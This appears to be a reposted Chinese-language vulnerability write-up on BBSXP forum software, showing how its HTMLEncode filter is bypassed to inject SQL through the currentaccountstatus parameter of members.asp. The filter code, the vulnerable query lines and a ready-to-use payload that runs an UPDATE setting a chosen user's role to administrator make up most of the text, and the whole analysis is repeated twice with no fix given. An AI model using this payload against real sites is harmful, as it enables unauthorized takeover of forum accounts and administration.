BBSXP绕过过滤继续注入漏洞分析
程序员文章站
2022-03-19 15:32:14
漏洞分析:
官方最新过滤函数HTMLEncode,这次过滤了字符* ,再一次绕过过滤注射
Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replac... 08-10-08...
漏洞分析:
官方最新过滤函数htmlencode,这次过滤了字符* ,再一次绕过过滤注射
function htmlencode(fstring)
fstring=replace(fstring,chr(9),"")
fstring=replace(fstring,chr(13),"")
fstring=replace(fstring,chr(22),"")
fstring=replace(fstring,chr(38),"&") '“&”
fstring=replace(fstring,chr(32)," ") '“ ”
fstring=replace(fstring,chr(34),""") '“"”
fstring=replace(fstring,chr(39),"'") '“'”
fstring=replace(fstring,chr(42),"*") '“*”
fstring=replace(fstring,chr(44),",") '“,”
fstring=replace(fstring,chr(45)&chr(45),"--") '“--”
fstring=replace(fstring,chr(60),"<") '“<”
fstring=replace(fstring,chr(62),">") '“>”
fstring=replace(fstring,chr(92),"\") '“\”
fstring=replace(fstring,chr(59),";") '“;”
fstring=replace(fstring,chr(10),"<br>")
fstring=replacetext(fstring,"([])([a-z0-9]*);","$1$2;")
if siteconfig("bannedtext")<>"" then fstring=replacetext(fstring,"("&siteconfig("bannedtext")&")",string(len("&$1&"),"*"))
if issqldatabase=0 then '过滤片假名(日文字符)[\u30a0-\u30ff] by yuzi
fstring=escape(fstring)
fstring=replacetext(fstring,"%u30([a-f][0-f])","0$1;")
fstring=unescape(fstring)
end if
htmlencode=fstring
end function
members.asp漏洞文件作为测试:
searchtype=htmlencode(request("searchtype")) //第8行
searchtext=htmlencode(request("searchtext"))
searchrole=requestint("searchrole")
currentaccountstatus=htmlencode(request("currentaccountstatus"))
......
if searchtext<>"" then item=item&" and ("&searchtype&" like '%"&searchtext&"%')" //第18行
......
if currentaccountstatus <> "" then item=item&" and useraccountstatus="¤taccountstatus&"" //第22行
if item<>"" then item=" where "&mid(item,5)
......
totalcount=execute("select count(userid) from ["&tableprefix&"users]"&item)(0) '获取数据数量
//第54行
看个sql语句:
select * from bbsxp_users where userid=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006c003600330036003400)
变量userid绕过过滤成功执行了update
同理构造:
searchtype=1
searchtext=1
currentaccountstatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006c003600330036003400)
官方最新过滤函数htmlencode,这次过滤了字符* ,再一次绕过过滤注射
function htmlencode(fstring)
fstring=replace(fstring,chr(9),"")
fstring=replace(fstring,chr(13),"")
fstring=replace(fstring,chr(22),"")
fstring=replace(fstring,chr(38),"&") '“&”
fstring=replace(fstring,chr(32)," ") '“ ”
fstring=replace(fstring,chr(34),""") '“"”
fstring=replace(fstring,chr(39),"'") '“'”
fstring=replace(fstring,chr(42),"*") '“*”
fstring=replace(fstring,chr(44),",") '“,”
fstring=replace(fstring,chr(45)&chr(45),"--") '“--”
fstring=replace(fstring,chr(60),"<") '“<”
fstring=replace(fstring,chr(62),">") '“>”
fstring=replace(fstring,chr(92),"\") '“\”
fstring=replace(fstring,chr(59),";") '“;”
fstring=replace(fstring,chr(10),"<br>")
fstring=replacetext(fstring,"([])([a-z0-9]*);","$1$2;")
if siteconfig("bannedtext")<>"" then fstring=replacetext(fstring,"("&siteconfig("bannedtext")&")",string(len("&$1&"),"*"))
if issqldatabase=0 then '过滤片假名(日文字符)[\u30a0-\u30ff] by yuzi
fstring=escape(fstring)
fstring=replacetext(fstring,"%u30([a-f][0-f])","0$1;")
fstring=unescape(fstring)
end if
htmlencode=fstring
end function
members.asp漏洞文件作为测试:
searchtype=htmlencode(request("searchtype")) //第8行
searchtext=htmlencode(request("searchtext"))
searchrole=requestint("searchrole")
currentaccountstatus=htmlencode(request("currentaccountstatus"))
......
if searchtext<>"" then item=item&" and ("&searchtype&" like '%"&searchtext&"%')" //第18行
......
if currentaccountstatus <> "" then item=item&" and useraccountstatus="¤taccountstatus&"" //第22行
if item<>"" then item=" where "&mid(item,5)
......
totalcount=execute("select count(userid) from ["&tableprefix&"users]"&item)(0) '获取数据数量
//第54行
看个sql语句:
select * from bbsxp_users where userid=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006c003600330036003400)
变量userid绕过过滤成功执行了update
同理构造:
searchtype=1
searchtext=1
currentaccountstatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006c003600330036003400)